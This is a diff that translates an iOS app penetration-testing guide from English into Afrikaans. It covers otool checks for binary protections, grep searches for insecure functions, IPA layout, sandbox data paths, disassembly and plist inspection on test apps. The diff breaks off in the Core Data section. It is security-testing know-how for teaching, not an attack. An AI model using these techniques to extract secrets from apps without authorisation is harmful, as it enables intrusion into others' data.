-## iOS Basics +## iOS Basiese beginsels {% content-ref url="ios-basics.md" %} [ios-basics.md](ios-basics.md) {% endcontent-ref %} -## Testing Environment +## Toetsomgewing -In this page you can find information about the **iOS simulator**, **emulators** and **jailbreaking:** +Op hierdie bladsy kan jy inligting vind oor die **iOS-simuleerder**, **emulators** en **jailbreaking:** {% content-ref url="ios-testing-environment.md" %} [ios-testing-environment.md](ios-testing-environment.md) {% endcontent-ref %} -## Initial Analysis +## Aanvanklike analise -### Basic iOS Testing Operations +### Basiese iOS-toetsoperasies -During the testing **several operations are going to be suggested** (connect to the device, read/write/upload/download files, use some tools...). Therefore, if you don't know how to perform any of these actions please, **start reading the page**: +Tydens die toetsing sal verskeie operasies voorgestel word (verbind met die toestel, lees/skryf/oplaai/aflaai lêers, gebruik van gereedskap...). As jy dus nie weet hoe om enige van hierdie aksies uit te voer nie, **begin deur die bladsy te lees**: {% content-ref url="basic-ios-testing-operations.md" %} [basic-ios-testing-operations.md](basic-ios-testing-operations.md) {% endcontent-ref %} {% hint style="info" %} -For the following steps **the app should be installed** in the device and should have already obtained the **IPA file** of the application.\ -Read the [Basic iOS Testing Operations](basic-ios-testing-operations.md) page to learn how to do this. +Vir die volgende stappe **moet die toepassing geïnstalleer wees** op die toestel en moet jy reeds die **IPA-lêer** van die toepassing verkry het.\ +Lees die [Basiese iOS-toetsoperasies](basic-ios-testing-operations.md) bladsy om te leer hoe om dit te doen. 
{% endhint %} -### Basic Static Analysis +### Basiese statiese analise -It's recommended to use the tool [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) to perform an automatic Static Analysis to the IPA file. +Dit word aanbeveel om die instrument [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) te gebruik om 'n outomatiese statiese analise op die IPA-lêer uit te voer. -Identification of **protections are present in the binary**: +Identifikasie van **beskermings wat teenwoordig is in die binêre lêer**: -* **PIE (Position Independent Executable)**: When enabled, the application loads into a random memory address every-time it launches, making it harder to predict its initial memory address. - - ```bash - otool -hv | grep PIE # It should include the PIE flag - ``` -* **Stack Canaries**: To validate the integrity of the stack, a ‘canary’ value is placed on the stack before calling a function and is validated again once the function ends. - - ```bash - otool -I -v | grep stack_chk # It should include the symbols: stack_chk_guard and stack_chk_fail - ``` -* **ARC (Automatic Reference Counting)**: To prevent common memory corruption flaws - - ```bash - otool -I -v | grep objc_release # It should include the _objc_release symbol - ``` -* **Encrypted Binary**: The binary should be encrypted - - ```bash - otool -arch all -Vl | grep -A5 LC_ENCRYPT # The cryptid should be 1 - ``` - -**Identification of Sensitive/Insecure Funcions** - -* **Weak Hashing Algorithms** - - ```bash - # On the iOS device - otool -Iv | grep -w "_CC_MD5" - otool -Iv | grep -w "_CC_SHA1" - - # On linux - grep -iER "_CC_MD5" - grep -iER "_CC_SHA1" - ``` -* **Insecure Random Functions** - - ```bash - # On the iOS device - otool -Iv | grep -w "_random" - otool -Iv | grep -w "_srand" - otool -Iv | grep -w "_rand" - - # On linux - grep -iER "_random" - grep -iER "_srand" - grep -iER "_rand" - ``` -* **Insecure ‘Malloc’ Function** - - ```bash - # On the iOS device - 
otool -Iv | grep -w "_malloc" - - # On linux - grep -iER "_malloc" - ``` -* **Insecure and Vulnerable Functions** - - ```bash - # On the iOS device - otool -Iv | grep -w "_gets" - otool -Iv | grep -w "_memcpy" - otool -Iv | grep -w "_strncpy" - otool -Iv | grep -w "_strlen" - otool -Iv | grep -w "_vsnprintf" - otool -Iv | grep -w "_sscanf" - otool -Iv | grep -w "_strtok" - otool -Iv | grep -w "_alloca" - otool -Iv | grep -w "_sprintf" - otool -Iv | grep -w "_printf" - otool -Iv | grep -w "_vsprintf" - - # On linux - grep -R "_gets" - grep -iER "_memcpy" - grep -iER "_strncpy" - grep -iER "_strlen" - grep -iER "_vsnprintf" - grep -iER "_sscanf" - grep -iER "_strtok" - grep -iER "_alloca" - grep -iER "_sprintf" - grep -iER "_printf" - grep -iER "_vsprintf" - ``` - -### Basic Dynamic Analysis - -Check out the dynamic analysis that [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) perform. You will need to navigate through the different views and interact with them but it will be hooking several classes on doing other things and will prepare a report once you are done. - -### Listing Installed Apps - -Use the command `frida-ps -Uai` to determine the **bundle identifier** of the installed apps: +* **PIE (Position Independent Executable)**: Wanneer dit geaktiveer is, laai die toepassing in 'n willekeurige geheue-adres elke keer as dit begin, wat dit moeiliker maak om sy aanvanklike geheue-adres te voorspel. +```bash +otool -hv | grep PIE # Dit moet die PIE-vlag insluit +``` +* **Stack Canaries**: Om die integriteit van die stapel te valideer, word 'n 'kanarie'-waarde op die stapel geplaas voordat 'n funksie geroep word en weer gevalideer sodra die funksie eindig. 
+ +```bash +otool -I -v | grep stack_chk # Dit moet die simbole: stack_chk_guard en stack_chk_fail insluit +``` +* **ARC (Automatic Reference Counting)**: Om algemene geheuekorruptie-foute te voorkom + +```bash +otool -I -v | grep objc_release # Dit moet die _objc_release-simbool insluit +``` +* **Versleutelde Binêre**: Die binêre lêer moet versleutel wees + +```bash +otool -arch all -Vl | grep -A5 LC_ENCRYPT # Die cryptid moet 1 wees +``` + +**Identifikasie van Sensitiewe/Onveilige Funksies** + +* **Swak Hashing-algoritmes** + +```bash +# Op die iOS-toestel +otool -Iv | grep -w "_CC_MD5" +otool -Iv | grep -w "_CC_SHA1" + +# Op Linux +grep -iER "_CC_MD5" +grep -iER "_CC_SHA1" +``` +* **Onveilige Willekeurige Funksies** + +```bash +# Op die iOS-toestel +otool -Iv | grep -w "_random" +otool -Iv | grep -w "_srand" +otool -Iv | grep -w "_rand" + +# Op Linux +grep -iER "_random" +grep -iER "_srand" +grep -iER "_rand" +``` +* **Onveilige 'Malloc'-Funksie** + +```bash +# Op die iOS-toestel +otool -Iv | grep -w "_malloc" + +# Op Linux +grep -iER "_malloc" +``` +* **Onveilige en Kwesbare Funksies** + +```bash +# Op die iOS-toestel +otool -Iv | grep -w "_gets" +otool -Iv | grep -w "_memcpy" +otool -Iv | grep -w "_strncpy" +otool -Iv | grep -w "_strlen" +otool -Iv | grep -w "_vsnprintf" +otool -Iv | grep -w "_sscanf" +otool -Iv | grep -w "_strtok" +otool -Iv | grep -w "_alloca" +otool -Iv | grep -w "_sprintf" +otool -Iv | grep -w "_printf" +otool -Iv | grep -w "_vsprintf" + +# Op Linux +grep -R "_gets" +grep -iER "_memcpy" +grep -iER "_strncpy" +grep -iER "_strlen" +grep -iER "_vsnprintf" +grep -iER "_sscanf" +grep -iER "_strtok" +grep -iER "_alloca" +grep -iER "_sprintf" +grep -iER "_printf" +grep -iER "_vsprintf" +``` + +### Basiese Dinamiese Analise + +Kyk na die dinamiese analise wat [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) uitvoer. 
Jy sal deur die verskillende aansigte moet blaai en met hulle moet interaksie hê, maar dit sal verskeie klasse koppel en ander dinge doen en 'n verslag voorberei sodra jy klaar is. + +### Lys van Geïnstalleerde Toepassings + +Gebruik die opdrag `frida-ps -Uai` om die **bundel-identifiseerder** van die geïnstalleerde toepassings te bepaal: ```bash $ frida-ps -Uai - PID Name Identifier +PID Name Identifier ---- ------------------- ----------------------------------------- 6847 Calendar com.apple.mobilecal 6815 Mail com.apple.mobilemail - - App Store com.apple.AppStore - - Apple Store com.apple.store.Jolly - - Calculator com.apple.calculator - - Camera com.apple.camera - - iGoat-Swift OWASP.iGoat-Swift +- App Store com.apple.AppStore +- Apple Store com.apple.store.Jolly +- Calculator com.apple.calculator +- Camera com.apple.camera +- iGoat-Swift OWASP.iGoat-Swift ``` +### Basiese Enumerasie & Hooking -### Basic Enumeration & Hooking - -Learn how to **enumerate the components of the application** and how to easily **hook methods and classes** with objection: +Leer hoe om die komponente van die toepassing te **enumerateer** en hoe om maklik **metodes en klasse te hook** met objection: {% content-ref url="ios-hooking-with-objection.md" %} [ios-hooking-with-objection.md](ios-hooking-with-objection.md) {% endcontent-ref %} -### IPA Structure +### IPA-Struktuur -The structure of an **IPA file** is essentially that of a **zipped package**. By renaming its extension to `.zip`, it can be **decompressed** to reveal its contents. Within this structure, a **Bundle** represents a fully packaged application ready for installation. Inside, you will find a directory named `.app`, which encapsulates the application's resources. +Die struktuur van 'n **IPA-lêer** is essensieel dié van 'n **gezippte pakkie**. Deur die uitbreiding te verander na `.zip`, kan dit **gedekomprimeer** word om sy inhoud te onthul. 
Binne hierdie struktuur verteenwoordig 'n **Bundel** 'n volledig verpakte toepassing gereed vir installasie. Binne-in sal jy 'n gids vind met die naam `.app`, wat die hulpbronne van die toepassing inkapsuleer. -* **`Info.plist`**: This file holds specific configuration details of the application. -* **`_CodeSignature/`**: This directory includes a plist file that contains a signature, ensuring the integrity of all files in the bundle. -* **`Assets.car`**: A compressed archive that stores asset files like icons. -* **`Frameworks/`**: This folder houses the application's native libraries, which may be in the form of `.dylib` or `.framework` files. -* **`PlugIns/`**: This may include extensions to the application, known as `.appex` files, although they are not always present. -* [**`Core Data`**](https://developer.apple.com/documentation/coredata): It is used to save your application’s permanent data for offline use, to cache temporary data, and to add undo functionality to your app on a single device. To sync data across multiple devices in a single iCloud account, Core Data automatically mirrors your schema to a CloudKit container. -* [**`PkgInfo`**](https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPRuntimeConfig/Articles/ConfigApplications.html): The `PkgInfo` file is an alternate way to specify the type and creator codes of your application or bundle. -* **en.lproj, fr.proj, Base.lproj**: Are the language packs that contains resources for those specific languages, and a default resource in case a language isn' t supported. -* **Security**: The `_CodeSignature/` directory plays a critical role in the app's security by verifying the integrity of all bundled files through digital signatures. -* **Asset Management**: The `Assets.car` file uses compression to efficiently manage graphical assets, crucial for optimizing application performance and reducing its overall size. 
-* **Frameworks and PlugIns**: These directories underscore the modularity of iOS applications, allowing developers to include reusable code libraries (`Frameworks/`) and extend app functionality (`PlugIns/`). -* **Localization**: The structure supports multiple languages, facilitating global application reach by including resources for specific language packs. +* **`Info.plist`**: Hierdie lêer bevat spesifieke konfigurasiebesonderhede van die toepassing. +* **`_CodeSignature/`**: Hierdie gids bevat 'n plist-lêer wat 'n handtekening bevat wat die integriteit van alle lêers in die bundel verseker. +* **`Assets.car`**: 'n Gekomprimeerde argief wat bateslêers soos ikone stoor. +* **`Frameworks/`**: Hierdie gids bevat die toepassing se inheemse biblioteke, wat in die vorm van `.dylib`- of `.framework`-lêers kan wees. +* **`PlugIns/`**: Dit kan uitbreidings van die toepassing insluit, bekend as `.appex`-lêers, alhoewel hulle nie altyd teenwoordig is nie. +* [**`Kerndata`**](https://developer.apple.com/documentation/coredata): Dit word gebruik om jou toepassing se permanente data vir aflyngebruik te stoor, tydelike data te kasheer en ongedaanmaakfunksionaliteit by jou app op 'n enkele toestel by te voeg. Om data oor meerdere toestelle in 'n enkele iCloud-rekening te sinchroniseer, spieël Kerndata outomaties jou skema na 'n CloudKit-houer. +* [**`PkgInfo`**](https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPRuntimeConfig/Articles/ConfigApplications.html): Die `PkgInfo`-lêer is 'n alternatiewe manier om die tipe en skepperkodes van jou toepassing of bundel te spesifiseer. +* **en.lproj, fr.proj, Base.lproj**: Dit is die taalpakkies wat hulpbronne vir daardie spesifieke tale bevat, en 'n verstekhulpbron in die geval dat 'n taal nie ondersteun word nie. +* **Sekuriteit**: Die `_CodeSignature/`-gids speel 'n kritieke rol in die veiligheid van die app deur die integriteit van alle gebundelde lêers deur digitale handtekeninge te verifieer. 
+* **Batebestuur**: Die `Assets.car`-lêer gebruik kompressie om grafiese bates doeltreffend te bestuur, wat noodsaaklik is vir die optimalisering van toepassingsprestasie en die vermindering van die algehele grootte daarvan. +* **Raamwerke en Inproppe**: Hierdie gidse beklemtoon die modulariteit van iOS-toepassings, wat ontwikkelaars in staat stel om herbruikbare kodelibras (`Frameworks/`) in te sluit en app-funksionaliteit uit te brei (`PlugIns/`). +* **Lokalisering**: Die struktuur ondersteun meertaligheid, wat globale toepassingsbereik fasiliteer deur hulpbronne vir spesifieke taalpakkies in te sluit. **Info.plist** -The **Info.plist** serves as a cornerstone for iOS applications, encapsulating key configuration data in the form of **key-value** pairs. This file is a requisite for not only applications but also for app extensions and frameworks bundled within. It's structured in either XML or a binary format and holds critical information ranging from app permissions to security configurations. For a detailed exploration of available keys, one can refer to the [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information_property_list?language=objc). +Die **Info.plist** dien as 'n hoeksteen vir iOS-toepassings, wat sleutelkonfigurasiedata inkapsuleer in die vorm van **sleutel-waarde** pare. Hierdie lêer is nie net 'n vereiste vir toepassings nie, maar ook vir app-uitbreidings en raamwerke wat daarmee saamgevoeg is. Dit is gestruktureer in XML of 'n binêre formaat en bevat kritieke inligting wat wissel van app-toestemmings tot sekuriteitskonfigurasies. Vir 'n gedetailleerde verkenning van beskikbare sleutels kan verwys word na die [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information_property_list?language=objc). 
-For those looking to work with this file in a more accessible format, the XML conversion can be achieved effortlessly through the use of `plutil` on macOS (available natively on versions 10.2 and later) or `plistutil` on Linux. The commands for conversion are as follows: +Vir diegene wat met hierdie lêer wil werk in 'n toegankliker formaat, kan die XML-omskakeling moeiteloos bereik word deur die gebruik van `plutil` op macOS (beskikbaar as 'n standaard op weergawes 10.2 en later) of `plistutil` op Linux. Die opdragte vir omskakeling is as volg: -- **For macOS**: +- **Vir macOS**: ```bash $ plutil -convert xml1 Info.plist ``` - -- **For Linux**: +- **Vir Linux**: ```bash $ apt install libplist-utils $ plistutil -i Info.plist -o Info_xml.plist ``` - -Among the myriad of information that the **Info.plist** file can divulge, notable entries include app permission strings (`UsageDescription`), custom URL schemes (`CFBundleURLTypes`), and configurations for App Transport Security (`NSAppTransportSecurity`). These entries, along with others like exported/imported custom document types (`UTExportedTypeDeclarations` / `UTImportedTypeDeclarations`), can be effortlessly located by inspecting the file or employing a simple `grep` command: - +Onder die menigte van inligting wat die **Info.plist** lêer kan onthul, sluit merkwaardige inskrywings in soos app-toestemmingsstrings (`UsageDescription`), aangepaste URL-skemas (`CFBundleURLTypes`), en konfigurasies vir App Transport Security (`NSAppTransportSecurity`). Hierdie inskrywings, tesame met ander soos uitgevoerde/ingevoerde aangepaste dokumenttipes (`UTExportedTypeDeclarations` / `UTImportedTypeDeclarations`), kan maklik opgespoor word deur die lêer te ondersoek of 'n eenvoudige `grep`-opdrag te gebruik: ```bash $ grep -i Info.plist ``` +**Data Paaie** -**Data Paths** - -In the iOS environment, directories are designated specifically for **system applications** and **user-installed applications**. 
System applications reside in the `/Applications` directory, while user-installed apps are placed under `/private/var/containers/`. These applications are assigned a unique identifier known as a **128-bit UUID**, making the task of manually locating an app's folder challenging due to the randomness of the directory names. - -To facilitate the discovery of a user-installed app's installation directory, the **objection tool** provides a useful command, `env`. This command reveals detailed directory information for the app in question. Below is an example of how to use this command: +In die iOS-omgewing word gidsies spesifiek aangewys vir **sisteemtoepassings** en **gebruiker-geïnstalleerde toepassings**. Sisteemtoepassings bly in die `/Applications` gids, terwyl gebruiker-geïnstalleerde toepassings onder `/private/var/containers/` geplaas word. Hierdie toepassings word toegewys aan 'n unieke identifiseerder wat bekend staan as 'n **128-bit UUID**, wat die taak van die handmatige vind van 'n toepassing se gidsie uitdagend maak as gevolg van die willekeurigheid van die gidsnaam. +Om die ontdekking van 'n gebruiker-geïnstalleerde toepassing se installasiegids te vergemaklik, bied die **objection tool** 'n nuttige bevel, `env`. Hierdie bevel onthul gedetailleerde gidsinligting vir die betrokke toepassing. Hieronder is 'n voorbeeld van hoe om hierdie bevel te gebruik: ```bash OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # env 
@@ -228,61 +221,55 @@ CachesDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8E DocumentDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Documents LibraryDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library ``` - -Alternatively, the app name can be searched within the `/private/var/containers` using the `find` command: - +Alternatiewelik kan die app-naam binne die `/private/var/containers` gesoek word met behulp van die `find`-opdrag: ```bash find /private/var/containers -name "Progname*" ``` - -Commands such as `ps` and `lsof` can also be utilized to identify the app's process and list open files, respectively, providing insights into the application's active directory paths: - +Opdragte soos `ps` en `lsof` kan ook gebruik word om die proses van die app te identifiseer en oop lêers te lys, onderskeidelik, wat insig bied in die aktiewe gidspaaie van die toepassing: ```bash ps -ef | grep -i lsof -p | grep -i "/containers" | head -n 1 ``` - -**Bundle directory:** +**Bundelgids:** * **AppName.app** - * This is the Application Bundle as seen before in the IPA, it contains essential application data, static content as well as the application's compiled binary. - * This directory is visible to users, but **users can't write to it**. - * Content in this directory is **not backed up**. - * The contents of this folder are used to **validate the code signature**. +* Dit is die toepassingsbundel soos voorheen in die IPA gesien, dit bevat noodsaaklike toepassingsdata, statiese inhoud sowel as die toepassing se saamgestelde binêre lêer. +* Hierdie gids is sigbaar vir gebruikers, maar **gebruikers kan nie daarin skryf nie**. +* Inhoud in hierdie gids word **nie rugsteun gegee nie**. +* Die inhoud van hierdie gids word gebruik om die kodesignatuur te **valideer**. -**Data directory:** +**Datagids:** * **Documents/** - * Contains all the user-generated data. 
The application end user initiates the creation of this data. - * Visible to users and **users can write to it**. - * Content in this directory is **backed up**. - * The app can disable paths by setting `NSURLIsExcludedFromBackupKey`. +* Bevat alle gebruikers gegenereerde data. Die toepassing se eindgebruiker begin die skepping van hierdie data. +* Sigbaar vir gebruikers en **gebruikers kan daarin skryf**. +* Inhoud in hierdie gids word **rugsteun gegee**. +* Die toepassing kan paaie uitskakel deur `NSURLIsExcludedFromBackupKey` in te stel. * **Library/** - * Contains all **files that aren't user-specific**, such as **caches**, **preferences**, **cookies**, and property list (plist) configuration files. - * iOS apps usually use the `Application Support` and `Caches` subdirectories, but the app can create custom subdirectories. +* Bevat alle **lêers wat nie gebruikers-spesifiek is nie**, soos **geheue-opberging**, **voorkeure**, **koekies**, en eiendomslys (plist) konfigurasie lêers. +* iOS-toepassings gebruik gewoonlik die `Application Support` en `Caches` subgidse, maar die toepassing kan aangepaste subgidse skep. * **Library/Caches/** - * Contains **semi-persistent cached files.** - * Invisible to users and **users can't write to it**. - * Content in this directory is **not backed up**. - * The OS may delete this directory's files automatically when the app is not running and storage space is running low. +* Bevat **semi-blywende gegispte lêers**. +* Onsigbaar vir gebruikers en **gebruikers kan nie daarin skryf nie**. +* Inhoud in hierdie gids word **nie rugsteun gegee nie**. +* Die bedryfstelsel kan hierdie gids se lêers outomaties verwyder wanneer die toepassing nie loop nie en stoorruimte min is. * **Library/Application Support/** - * Contains **persistent** **files** necessary for running the app. - * **Invisible** **to** **users** and users can't write to it. - * Content in this directory is **backed** **up**. 
- * The app can disable paths by setting `NSURLIsExcludedFromBackupKey`. +* Bevat **blywende lêers** wat nodig is vir die uitvoering van die toepassing. +* **Onsigbaar** vir gebruikers en gebruikers kan nie daarin skryf nie. +* Inhoud in hierdie gids word **rugsteun gegee**. +* Die toepassing kan paaie uitskakel deur `NSURLIsExcludedFromBackupKey` in te stel. * **Library/Preferences/** - * Used for storing properties that can **persist even after an application is restarted**. - * Information is saved, unencrypted, inside the application sandbox in a plist file called \[BUNDLE\_ID].plist. - * All the key/value pairs stored using `NSUserDefaults` can be found in this file. +* Word gebruik om eienskappe te stoor wat **selfs na die herbegin van 'n toepassing volhou**. +* Inligting word onversleutel binne die toepassing se sandput in 'n plist-lêer genaamd \[BUNDLE\_ID].plist gestoor. +* Al die sleutel/waarde-pare wat met `NSUserDefaults` gestoor word, kan in hierdie lêer gevind word. * **tmp/** - * Use this directory to write **temporary files** that do not need to persist between app launches. - * Contains non-persistent cached files. - * **Invisible** to users. - * Content in this directory is not backed up. - * The OS may delete this directory's files automatically when the app is not running and storage space is running low. - -Let's take a closer look at iGoat-Swift's Application Bundle (.app) directory inside the Bundle directory (`/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app`): +* Gebruik hierdie gids om **tydelike lêers** te skryf wat nie tussen toepassingsbeginne volhou nie. +* Bevat nie-blywende gegispte lêers. +* **Onsigbaar** vir gebruikers. +* Inhoud in hierdie gids word nie rugsteun gegee nie. +* Die bedryfstelsel kan hierdie gids se lêers outomaties verwyder wanneer die toepassing nie loop nie en stoorruimte min is nie. 
+Kom ons kyk nou na iGoat-Swift se Toepassingsbundel (.app) gids binne die Bundelgids (`/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app`): ```bash OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # ls NSFileType Perms NSFileProtection ... Name 
@@ -296,37 +283,31 @@ Regular 420 None ... LICENSE.txt Regular 420 None ... Sentinel.txt Regular 420 None ... README.txt ``` +### Binêre Omkeer -### Binary Reversing - -Inside the `.app` folder you will find a binary file called ``. This is the file that will be **executed**. You can perform a basic inspection of the binary with the tool **`otool`**: - +Binne die `.app`-map sal jy 'n binêre lêer kry genaamd ``. Dit is die lêer wat **uitgevoer** sal word. Jy kan 'n basiese inspeksie van die binêre lêer doen met die hulpmiddel **`otool`**: ```bash otool -Vh DVIA-v2 #Check some compilation attributes - magic cputype cpusubtype caps filetype ncmds sizeofcmds flags +magic cputype cpusubtype caps filetype ncmds sizeofcmds flags MH_MAGIC_64 ARM64 ALL 0x00 EXECUTE 65 7112 NOUNDEFS DYLDLINK TWOLEVEL WEAK_DEFINES BINDS_TO_WEAK PIE otool -L DVIA-v2 #Get third party libraries DVIA-v2: - /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 400.9.1) - /usr/lib/libsqlite3.dylib (compatibility version 9.0.0, current version 274.6.0) - /usr/lib/libz.1.dylib (compatibility version 1.0.0, current version 1.2.11) - @rpath/Bolts.framework/Bolts (compatibility version 1.0.0, current version 1.0.0) +/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 400.9.1) +/usr/lib/libsqlite3.dylib (compatibility version 9.0.0, current version 274.6.0) +/usr/lib/libz.1.dylib (compatibility version 1.0.0, current version 1.2.11) +@rpath/Bolts.framework/Bolts (compatibility version 1.0.0, current version 1.0.0) [...] ``` +**Kyk of die app versleutel is** -**Check if the app is encrypted** - -See if there is any output for: - +Kyk of daar enige uitset is vir: ```bash otool -l | grep -A 4 LC_ENCRYPTION_INFO ``` +**Ontleding van die binêre** -**Disassembling the binary** - -Disassemble the text section: - +Ontleed die teksafdeling: ```bash otool -tV DVIA-v2 DVIA-v2: 
@@ -340,25 +321,21 @@ DVIA-v2: 0000000100004acc adrp x10, 1098 ; 0x10044e000 0000000100004ad0 add x10, x10, #0x268 ``` - -To print the **Objective-C segment** of the sample application one can use: - +Om die **Objective-C-segment** van die voorbeeldtoepassing af te druk, kan 'n mens die volgende gebruik: ```bash otool -oV DVIA-v2 DVIA-v2: Contents of (__DATA,__objc_classlist) section 00000001003dd5b8 0x1004423d0 _OBJC_CLASS_$_DDLog - isa 0x1004423a8 _OBJC_METACLASS_$_DDLog - superclass 0x0 _OBJC_CLASS_$_NSObject - cache 0x0 __objc_empty_cache - vtable 0x0 - data 0x1003de748 - flags 0x80 - instanceStart 8 +isa 0x1004423a8 _OBJC_METACLASS_$_DDLog +superclass 0x0 _OBJC_CLASS_$_NSObject +cache 0x0 __objc_empty_cache +vtable 0x0 +data 0x1003de748 +flags 0x80 +instanceStart 8 ``` - -In order to obtain a more compact Objective-C code you can use [**class-dump**](http://stevenygard.com/projects/class-dump/): - +Om 'n meer kompakte Objective-C-kode te verkry, kan jy [**class-dump**](http://stevenygard.com/projects/class-dump/) gebruik: ```bash class-dump some-app // @@ -370,346 +347,327 @@ class-dump some-app #pragma mark Named Structures struct CGPoint { - double _field1; - double _field2; +double _field1; +double _field2; }; struct CGRect { - struct CGPoint _field1; - struct CGSize _field2; +struct CGPoint _field1; +struct CGSize _field2; }; struct CGSize { - double _field1; - double _field2; +double _field1; +double _field2; }; ``` - -However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download\_freeware/). +Togtans, die beste opsies om die binêre lêer te ontbind is: [**Hopper**](https://www.hopperapp.com/download.html?) en [**IDA**](https://www.hex-rays.com/products/ida/support/download\_freeware/).
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskaplike gereedskap.\ +Kry Vandag Toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Data Storage +## Data Berging -To learn about how iOS stores data in the device read this page: +Om te leer hoe iOS data in die toestel stoor, lees hierdie bladsy: {% content-ref url="ios-basics.md" %} [ios-basics.md](ios-basics.md) {% endcontent-ref %} {% hint style="warning" %} -The following places to store information should be checked **right after installing the application**, **after checking all the functionalities** of the application and even after **login out from one user and login into a different one**.\ -The goal is to find **unprotected sensitive information** of the application (passwords, tokens), of the current user and of previously logged users. +Die volgende plekke om inligting te stoor moet **direk na die installering van die toepassing** nagegaan word, **nadat al die funksies** van die toepassing nagegaan is, en selfs nadat **uitgelog is uit een gebruiker en ingelog is as 'n ander een**.\ +Die doel is om **ongebeskermd sensitiewe inligting** van die toepassing (wagwoorde, tokens), van die huidige gebruiker en van vorige aangemelde gebruikers te vind. {% endhint %} ### Plist -**plist** files are structured XML files that **contains key-value pairs**. It's a way to store persistent data, so sometimes you may find **sensitive information in these files**. 
It's recommended to check these files after installing the app and after using intensively it to see if new data is written. +**plist**-lêers is gestruktureerde XML-lêers wat **sleutel-waarde pare bevat**. Dit is 'n manier om volgehoue data te stoor, so soms kan jy **sensitiewe inligting in hierdie lêers vind**. Dit word aanbeveel om hierdie lêers na die installering van die app en na intensiewe gebruik daarvan te ondersoek om te sien of nuwe data geskryf word. -The most common way to persist data in plist files is through the usage of **NSUserDefaults**. This plist file is saved inside the app sandbox in **`Library/Preferences/.plist`** +Die mees algemene manier om data in plist-lêers vol te hou, is deur die gebruik van **NSUserDefaults**. Hierdie plist-lêer word binne die app-sandbox gestoor in **`Library/Preferences/.plist`** -The [`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults) class provides a programmatic interface for interacting with the default system. The default system allows an application to customize its behaviour according to **user preferences**. Data saved by `NSUserDefaults` can be viewed in the application bundle. This class stores **data** in a **plist** **file**, but it's meant to be used with small amounts of data. +Die [`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults) klas bied 'n programmatiese koppelvlak vir die interaksie met die verstekstelsel. Die verstekstelsel maak dit vir 'n toepassing moontlik om sy gedrag aan te pas volgens **gebruikersvoorkeure**. Data wat deur `NSUserDefaults` gestoor word, kan in die toepassingsbundel besigtig word. Hierdie klas stoor **data** in 'n **plist-lêer**, maar dit is bedoel om met klein hoeveelhede data gebruik te word. -This data cannot be longer accessed directly via a trusted computer, but can be accessed performing a **backup**. 
+Hierdie data kan nie direk via 'n betroubare rekenaar benader word nie, maar kan benader word deur 'n **back-up** uit te voer. -You can **dump** the information saved using **`NSUserDefaults`** using objection's `ios nsuserdefaults get` - -To find all the plist of used by the application you can access to `/private/var/mobile/Containers/Data/Application/{APPID}` and run: +Jy kan die gestoorde inligting **dump** deur **`NSUserDefaults`** te gebruik met behulp van objection se `ios nsuserdefaults get` +Om al die plist-lêers wat deur die toepassing gebruik word, te vind, kan jy toegang verkry tot `/private/var/mobile/Containers/Data/Application/{APPID}` en die volgende uitvoer: ```bash find ./ -name "*.plist" ``` +Om lêers vanaf **XML of binêre (bplist)** formaat na XML te omskep, is verskeie metodes beskikbaar, afhangende van jou bedryfstelsel: -To convert files from **XML or binary (bplist)** format to XML, various methods depending on your operating system are available: +**Vir macOS-gebruikers:** +Gebruik die `plutil` opdrag. Dit is 'n ingeboude hulpmiddel in macOS (10.2+), ontwerp vir hierdie doel: -**For macOS Users:** -Utilize the `plutil` command. It's a built-in tool in macOS (10.2+), designed for this purpose: +```bash +plutil -convert xml1 +``` +Hierdie opdrag sal die lêer omskep na XML-formaat en dit sal die oorspronklike lêer vervang met die nuwe XML-lêer. 
```bash $ plutil -convert xml1 Info.plist ``` - -**For Linux Users:** -Install `libplist-utils` first, then use `plistutil` to convert your file: - +**Vir Linux-gebruikers:** +Installeer eers `libplist-utils` en gebruik dan `plistutil` om jouw lêer om te skakel: ```bash $ apt install libplist-utils $ plistutil -i Info.plist -o Info_xml.plist ``` - -**Within an Objection Session:** -For analyzing mobile applications, a specific command allows you to convert plist files directly: - +**Binne 'n Objection-sessie:** +Vir die analise van mobiele toepassings, stel 'n spesifieke bevel jou in staat om plist-lêers direk om te skakel: ```bash ios plist cat /private/var/mobile/Containers/Data/Application//Library/Preferences/com.some.package.app.plist ``` - ### Core Data -[`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple\_ref/doc/uid/TP40001075-CH8-SW1) is a framework for managing the model layer of objects in your application. [Core Data can use SQLite as its persistent store](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), but the framework itself is not a database.\ -CoreData does not encrypt it's data by default. However, an additional encryption layer can be added to CoreData. See the [GitHub Repo](https://github.com/project-imas/encrypted-core-data) for more details. +[`Core 